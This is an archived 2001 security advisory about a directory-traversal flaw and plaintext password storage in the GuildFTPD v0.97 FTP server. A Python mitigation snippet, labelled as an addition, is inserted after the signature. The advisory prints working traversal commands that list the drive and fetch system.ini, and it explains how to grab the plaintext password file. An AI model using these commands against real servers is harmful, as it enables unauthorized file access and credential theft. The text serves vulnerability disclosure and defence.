GuildFTPD v0.97 Directory Traversal / Weak password encryption

AFFECTED SYSTEMS

GuildFTPD v0.97
tested on Windows 9x, probably works on NT / 2k as well

DESCRIPTION

1) Directory Traversal

Consider the following FTP session (I'm using Windows' FTP.EXE proggie, and its associated commands) :

The following commands :

    CD ../
    CD .../
    CD /.../
    CD c:\
    etc...

all give "550 Access denied." errors, so the frontdoor seems to be closed...

The following stuff *does* work however :

    LS /../*

This way, we can map out the whole harddrive... other example :

    LS /../../windows/*

Now, to retrieve a file, do something like :

    GET /../windows/system.ini c:\received-file.txt

2) And another thing...

I don't want to whine to the guys who wrote this program, but storing the user:password pairs in plaintext in the program directory (the default.usr & default?.usr files) is asking for trouble : most ftp servers at least provide some way of encryption / hashing... when you combine this with the traversal bug, anyone can get the passwords of all the users by grabbing the default.usr file.

VENDOR STATUS

I have sent this advisory to both DrPhibez <guildftpdat_private> and Nitro187 (Matthew Flewelling) <nitroat_private>, the programmers of GuildFTPD

=======================================================
[ByteRage] <byterageat_private> [www.byterage.cjb.net]
=======================================================
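One way to close the gap described in section 1, as an added example (not GuildFTPD's code and not part of the original advisory): every command that takes a path, including the NLST and RETR that FTP.EXE sends for LS and GET, goes through the same containment check as CWD. FTP_ROOT, resolve(), handle() and the success reply string are assumptions made for the illustration.

```python
import posixpath
import re

FTP_ROOT = "/srv/ftp"  # assumed root for this example, not GuildFTPD's config


class AccessDenied(Exception):
    """Corresponds to the reply '550 Access denied.'"""


def resolve(cwd, arg):
    """Return the real path for a client argument, or raise AccessDenied.

    cwd is the session's virtual directory, e.g. '/' or '/pub/docs'.
    """
    arg = arg.replace("\\", "/")          # Windows accepts both separators
    if "\x00" in arg or re.match(r"[A-Za-z]:", arg):
        raise AccessDenied(arg)           # NUL byte or drive letter (c:\)
    virtual = arg if arg.startswith("/") else posixpath.join(cwd, arg)
    parts = []
    for seg in virtual.split("/"):
        seg = seg.rstrip(" ")             # Win32 ignores trailing spaces
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:                 # would climb above the FTP root
                raise AccessDenied(arg)
            parts.pop()
        elif set(seg) == {"."}:           # '...' and longer: Win9x parent aliases
            raise AccessDenied(arg)
        else:
            parts.append(seg)
    return posixpath.join(FTP_ROOT, *parts)


def handle(command, cwd, arg):
    """Every path-taking command goes through resolve(), not only CWD."""
    if command not in ("CWD", "LIST", "NLST", "RETR"):
        return "502 Command not implemented."
    try:
        resolve(cwd, arg)
    except AccessDenied:
        return "550 Access denied."
    return "200 OK (path accepted)"       # placeholder reply for the example
```

Wildcards such as `*` are kept as an ordinary final segment, so any expansion happens only after the directory part has been confined to the root.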
This archive was generated by hypermail 2b30 : Sat May 26 2001 - 11:03:06 PDT